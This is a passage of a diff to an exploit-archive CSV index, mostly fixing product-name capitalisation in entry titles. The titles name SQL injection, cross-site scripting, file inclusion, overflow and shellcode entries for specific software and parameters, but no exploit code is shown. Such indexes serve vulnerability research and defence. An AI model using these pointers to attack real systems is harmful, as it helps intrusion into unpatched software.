26839,platforms/php/webapps/26839.txt,"TML 0.5 - 'index.php' form Parameter Cross-Site Scripting",2005-12-15,X1ngBox,php,webapps,0 26840,platforms/php/webapps/26840.txt,"TML 0.5 - 'index.php' id Parameter SQL Injection",2005-12-15,X1ngBox,php,webapps,0 26841,platforms/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,php,webapps,0 @@ -23968,8 +23969,8 @@ id,file,description,date,author,platform,type,port 26850,platforms/cgi/webapps/26850.txt,"PPCal Shopping Cart 3.3 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26851,platforms/cgi/webapps/26851.txt,"Kryptronic ClickCartPro 5.1/5.2 - CP-APP.cgi Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26852,platforms/cgi/webapps/26852.txt,"Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26853,platforms/php/webapps/26853.txt,"ezDatabase 2.1.2 - 'index.php' p Parameter Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps,0 -26854,platforms/php/webapps/26854.txt,"ezDatabase 2.1.2 - 'index.php' db_id Parameter SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 +26853,platforms/php/webapps/26853.txt,"EZDatabase 2.1.2 - 'index.php' p Parameter Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps,0 +26854,platforms/php/webapps/26854.txt,"EZDatabase 2.1.2 - 'index.php' db_id Parameter SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26856,platforms/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 @@ -23985,7 +23986,7 @@ id,file,description,date,author,platform,type,port 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0 26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum - forum.php SQL Injection",2005-12-19,Zbigniew,php,webapps,0 26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 -26870,platforms/php/webapps/26870.txt,"Advanced GuestBook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 +26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - members.php Cross-Site Scripting",2005-12-19,krasza,php,webapps,0 26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 @@ -24002,7 +24003,7 @@ id,file,description,date,author,platform,type,port 26884,platforms/php/webapps/26884.txt,"Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26885,platforms/php/webapps/26885.txt,"Lighthouse CMS 1.1 - Search Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos,0 -26887,platforms/linux/dos/26887.rb,"rpcbind - (CALLIT Procedure) UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 +26887,platforms/linux/dos/26887.rb,"rpcbind - (CALLIT procedure) UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 26888,platforms/ios/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent Cross-Site Scripting",2013-07-16,Vulnerability-Lab,ios,webapps,0 26889,platforms/windows/local/26889.pl,"BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0 26890,platforms/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,ios,webapps,0 @@ -24066,16 +24067,16 @@ id,file,description,date,author,platform,type,port 26948,platforms/asp/webapps/26948.txt,"Sitekit CMS 6.6 - Request-call-back.html ClickFrom Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 - registration-form.html ClickFrom Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps,0 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Local Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 -26951,platforms/windows/dos/26951.py,"Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)",2013-07-18,ariarat,windows,dos,0 +26951,platforms/windows/dos/26951.py,"Microsoft Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)",2013-07-18,ariarat,windows,dos,0 26952,platforms/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26953,platforms/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26954,platforms/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 -26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 / 1.4.1 - 'index.php' p parameter Directory Traversal",2013-07-18,Mahendra,php,webapps,0 +26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 / 1.4.1 - 'index.php' p Parameter Directory Traversal",2013-07-18,Mahendra,php,webapps,0 26956,platforms/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26958,platforms/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,php,webapps,0 26959,platforms/php/webapps/26959.txt,"Papoo 2.1.2 - 'index.php' menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 -26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 - guestbook.php menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 +26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 - Guestbook.php menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 - print.php Multiple Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - article.php SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 @@ -24086,8 +24087,8 @@ id,file,description,date,author,platform,type,port 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 -26971,platforms/osx/dos/26971.txt,"Apple Mac OSX - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos,0 -26972,platforms/jsp/webapps/26972.txt,"oracle application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 +26971,platforms/osx/dos/26971.txt,"Apple Mac OS X - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos,0 +26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - display_ticket_thread.php ticket Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 @@ -24108,9 +24109,9 @@ id,file,description,date,author,platform,type,port 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 - Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 -26993,platforms/php/webapps/26993.txt,"OOApp GuestBook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 +26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 -26995,platforms/php/webapps/26995.txt,"PHPDocumentor 1.2/1.3 - Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps,0 +26995,platforms/php/webapps/26995.txt,"phpDocumentor 1.2/1.3 - Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps,0 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 - GetShell and GetCommand Partial File Disclosure",2006-01-01,xfocus,aix,local,0 26998,platforms/php/webapps/26998.txt,"OABoard 1.0 Forum - Remote File Inclusion",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24131,9 +24132,9 @@ id,file,description,date,author,platform,type,port 27009,platforms/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps,0 27010,platforms/windows/dos/27010.txt,"VbsEdit 5.9.3 - '.smi' Buffer Overflow",2013-07-22,d3b4g,windows,dos,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 -27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 - Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 +27012,platforms/windows/remote/27012.rb,"Apple QuickTime 7 - Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 -27015,platforms/php/webapps/27015.txt,"Chipmunk GuestBook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 +27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 - modules.php Multiple Parameter Cross-Site Scripting",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 - linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - AdminName Variable SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24177,7 +24178,7 @@ id,file,description,date,author,platform,type,port 27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 -27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0 +27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95<2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0 27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local,0 27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0 @@ -24199,7 +24200,7 @@ id,file,description,date,author,platform,type,port 27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script - SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 27076,platforms/hardware/webapps/27076.txt,"FOSCAM IP-Cameras - Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 27077,platforms/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,php,webapps,0 -27078,platforms/php/webapps/27078.txt,"AlstraSoft Template Seller Pro 3.25 - Fullview.php Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 +27078,platforms/php/webapps/27078.txt,"Alstrasoft Template Seller Pro 3.25 - Fullview.php Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0 @@ -24215,7 +24216,7 @@ id,file,description,date,author,platform,type,port 27091,platforms/cgi/webapps/27091.txt,"Ultimate Auction 3.67 - ItemList.pl Cross-Site Scripting",2006-01-16,querkopf,cgi,webapps,0 27092,platforms/php/webapps/27092.txt,"GTP iCommerce - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,php,webapps,0 27093,platforms/php/webapps/27093.txt,"EZDatabase 2.1.1 - 'index.php' Cross-Site Scripting",2006-01-16,"Josh Zlatin-Amishav",php,webapps,0 -27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - Bluetooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0 +27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 27097,platforms/php/webapps/27097.txt,"PHPXplorer 0.9.33 - Workspaces.php Directory Traversal",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 @@ -24225,7 +24226,7 @@ id,file,description,date,author,platform,type,port 27101,platforms/windows/dos/27101.txt,"Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service",2006-01-17,Karma,windows,dos,0 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 -27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - url BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' username Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 @@ -24234,7 +24235,7 @@ id,file,description,date,author,platform,type,port 27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 - blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 -27113,platforms/windows/dos/27113.c,"BitComet 0.60 - .Torrent File Handling Remote Buffer Overflow",2006-01-19,"Dejun Meng",windows,dos,0 +27113,platforms/windows/dos/27113.c,"BitComet 0.60 - '.Torrent' File Handling Remote Buffer Overflow",2006-01-19,"Dejun Meng",windows,dos,0 27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0 27116,platforms/php/webapps/27116.txt,"NewsPHP - 'index.php' Multiple SQL Injection",2006-01-23,SAUDI,php,webapps,0 @@ -24244,7 +24245,7 @@ id,file,description,date,author,platform,type,port 27120,platforms/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 - post.php HTML Injection",2006-01-23,"Roozbeh Afrasiabi",php,webapps,0 27121,platforms/php/webapps/27121.txt,"123 Flash Chat 5.0 - Remote Code Injection",2006-01-24,"Jesus Olmos Gonzalez",php,webapps,0 27122,platforms/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 - Notepad usercp.php HTML Injection",2006-01-24,"Roozbeh Afrasiabi",php,webapps,0 -27123,platforms/php/webapps/27123.txt,"Pixelpost 1.4.3 - User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 +27123,platforms/php/webapps/27123.txt,"PixelPost 1.4.3 - User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27124,platforms/php/webapps/27124.txt,"SleeperChat 0.3f - 'index.php' Cross-Site Scripting",2006-01-24,hackologie,php,webapps,0 27125,platforms/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27126,platforms/php/webapps/27126.txt,"CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24265,7 +24266,7 @@ id,file,description,date,author,platform,type,port 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - 'login.asp' SQL Injection",2006-01-19,code.shell,asp,webapps,0 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - forum.asp Multiple SQL Injection",2005-12-15,"Tran Viet Phuong",asp,webapps,0 -27144,platforms/linux/dos/27144.py,"Communigate Pro 5.0.6 - Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",linux,dos,0 +27144,platforms/linux/dos/27144.py,"CommuniGate Pro 5.0.6 - Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",linux,dos,0 27145,platforms/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x - Inline XML File Attachment Buffer Overflow",2006-01-28,"Mike Davis",linux,dos,0 27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - modules.php Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 @@ -24275,14 +24276,14 @@ id,file,description,date,author,platform,type,port 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.asp SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 27152,platforms/php/webapps/27152.txt,"BrowserCRM - results.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 -27154,platforms/php/webapps/27154.txt,"FarsiNews 2.1 - Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 +27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - Username Parameter SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injections",2006-02-01,Siegfried,php,webapps,0 27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 - index.php3 Cross-Site Scripting",2006-02-01,Siegfried,php,webapps,0 27159,platforms/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow",2006-02-01,"Adam Zabrocki",multiple,dos,0 27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 -27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-commerce - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 +27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-Commerce - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 27162,platforms/php/webapps/27162.txt,"cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-03,"Simo Ben Youssef",php,webapps,0 27163,platforms/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin - Directory Traversal",2006-02-04,"Timothy D. Morgan",cgi,webapps,0 27164,platforms/php/webapps/27164.txt,"UBB.Threads 6.3 - showflat.php SQL Injection",2006-01-29,k-otik,php,webapps,0 @@ -24299,11 +24300,11 @@ id,file,description,date,author,platform,type,port 27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 - SQL Injection",2006-02-09,papipsycho,php,webapps,0 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 -27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - Showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 +27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 -27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 +27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject Cross-Site Scripting",2006-02-10,"Jakob Balle",multiple,remote,0 -27183,platforms/php/webapps/27183.txt,"FarsiNews 2.1/2.5 - show_archives.php template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 +27183,platforms/php/webapps/27183.txt,"Farsinews 2.1/2.5 - show_archives.php template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - folders.update.php folderid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - 'index.php' $_SERVER['PHP_SELF'] Cross-Site Scripting",2006-02-11,"GulfTech Security",php,webapps,0 @@ -24323,8 +24324,8 @@ id,file,description,date,author,platform,type,port 27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 -27203,platforms/hardware/remote/27203.pl,"Fortinet FortiGate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 -27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - change_password.php Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 +27203,platforms/hardware/remote/27203.pl,"Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 +27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - u2u.php username Parameter Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24334,7 +24335,7 @@ id,file,description,date,author,platform,type,port 27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple - Malformed Field Denial of Service",2006-02-14,ZwelL,multiple,dos,0 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",multiple,dos,0 27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - search.php Cross-Site Scripting",2006-02-14,Citynova,php,webapps,0 -27214,platforms/php/webapps/27214.txt,"DeltaScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 +27214,platforms/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,php,webapps,0 27216,platforms/php/webapps/27216.txt,"sNews - 'index.php' Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 @@ -24347,7 +24348,7 @@ id,file,description,date,author,platform,type,port 27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - 